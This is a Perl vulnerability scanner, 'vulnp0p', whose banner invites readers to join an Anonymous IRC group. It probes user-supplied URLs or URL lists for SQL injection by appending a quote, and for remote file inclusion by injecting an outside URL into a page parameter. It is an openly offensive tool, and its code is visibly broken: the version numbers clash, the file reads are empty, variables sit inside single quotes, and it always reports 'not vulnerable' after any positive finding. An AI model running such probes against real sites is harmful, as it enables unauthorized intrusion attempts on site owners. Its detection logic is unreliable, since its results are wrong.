#!/usr/bin/perl use warnings; use LWP::UserAgent; use Getopt::Std; use IO::Socket; my $osid; my $os = $^O; if($os=~m/linux/){ $osid = 1; my $kernel = system('cat /proc/sys/kernel/osrelease'); my $osinfo = system('uname -a'); system('clear'); print "OS info: \n"; print "\n"; system('ESC]2;vulnp0p v1.6 by perlp0pperBEL'); print "$os $kernel info: $osinfo\n"; } if($os=~m/MSWin32/){ $osid = 2; eval { require Win32;} or last; my $osname = Win32::GetOSName(); my ($osver, $major, $minor, $id) = Win32::GetOSVersion(); system('cls'); print "OS info: \n"; print "\n"; system('title vulnp0p v1.6 by perlp0pper'); print "$os $osname $osver.$major.$minor $id\n"; } print q{ ######################################## # vulnp0p v2.1 by perlp0pper # # ------------------------------------ # # Anonymous group - join us at the irc # # ./vulnp0p -h for help # ######################################## }; getopts("hu:SRm:g", \%args); if(defined $args{h}){ &help; exit; } if(!defined $args{h} && !defined $args{u} && !defined $args{m}){ &help; exit; } sub help{ print "\n\n"; print "usage: ./vulnp0p [OPTIONS] [VULNERABILITY]\n"; print "\n"; print "OPTIONS:\n"; print "\n"; print "-u - scan single url\n"; print "-m - scan url list in file\n"; print "-g - scan with google\n"; print "-h - displays help menu\n"; print "\n"; print "VULNERABILITIES:\n"; print "\n"; print "-S - runs SQLi scan\n"; print "-R - runs RFI scan\n"; print "-------------------------------------------------------\n"; print "\n\n"; print "ex. ./vulnp0p -u http://www.example.org/index.php?page=35 -S\n"; print " ./vulnp0p -u http://www.example.org/index.php?page=main -R\n"; print " ./vulnp0p -u http://www.example.org/index.php?page=home.php -S -S\n"; print " ./vulnp0p -m url.txt -S -S\n"; print " ./vulnp0p -g -S -S\n"; print "\n\n"; print "-------------------------------------------------------\n"; }; if(defined $args{g}){ print "under construction\n"; exit; } if(defined $args{m}){ $ua1 = new LWP::UserAgent; my $file = $args{m}; open FILE, "<$file"; my @urls = ; my $url1; foreach $dork(@urls){ print "###################################################################\n"; print "# $dork #\n"; print "###################################################################\n"; $sqliurl1 = "$dork'"; if(defined $args{S}){ $ua1 = new LWP::UserAgent; print "[*] testing if $dork is vulnerable to sqli...\n"; print "[*] trying $sqliurl1 \n"; $test1 = $ua1->post($sqliurl1); print "[+] $dork is vulnerable to SQLi error: \n", $test1->status_line unless $test1->is_success; print "[+] $dork is vulnerable SQLi\n", $test1->content_type unless $test1->content_is_html; print "[-] $dork is not vulnerable to sqli\n"; } if(defined $args{R}){ print "[*] testing if $dork is vulnerable to RFI...\n"; if($dork=~m/^index.php?$/){ @page1 = split('=', $dork); $RFIurl1 = '$page1[0]=http://www.google.co.uk'; print "[*] trying $RFIurl \n"; $get1 = $ua1 -> get('$RFIurl1'); open FILE, ">>RFItest.txt"; print FILE $get1; $search1 = ; if($search1 =~ m/^google$/){ print "[+] $dork is vulnerable to RFI\n"; } } else{ print "[-] $dork is not vulnerable to RFI or $dork is not formed well\n"; } } } } if(defined $args{u}){ my $url = $args{u}; $sqliurl = "$url'"; $ua = new LWP::UserAgent; if(defined $args{S}){ print "[*] testing if $url is vulnerable to sqli...\n"; print "[*] trying $sqliurl \n"; $test = $ua->post($sqliurl); print "[+] $url is vulnerable to SQLi error: \n", $test->status_line unless $test->is_success; print "[+] $url is vulnerable to SQLi\n", $test->content_type unless $test->content_is_html; print "[-] $url is not vulnerable to sqli\n"; } if(defined $args{R}){ print "[*] testing if $url is vulnerable to RFI...\n"; if($url=~m/^index.php?$/){ @page = split('=', $url); $RFIurl = '$page[0]=http://www.google.co.uk'; print "[*] trying $RFIurl \n"; $get = $ua -> get('$RFIurl'); open FILE, ">>RFItest.txt"; print FILE $get; $search = ; if($search =~ m/^google$/){ print "[+] $url is vulnerable to RFI\n"; } } else{ print "[-] $url is not vulnerable to RFI or $url is not formed well\n"; } } }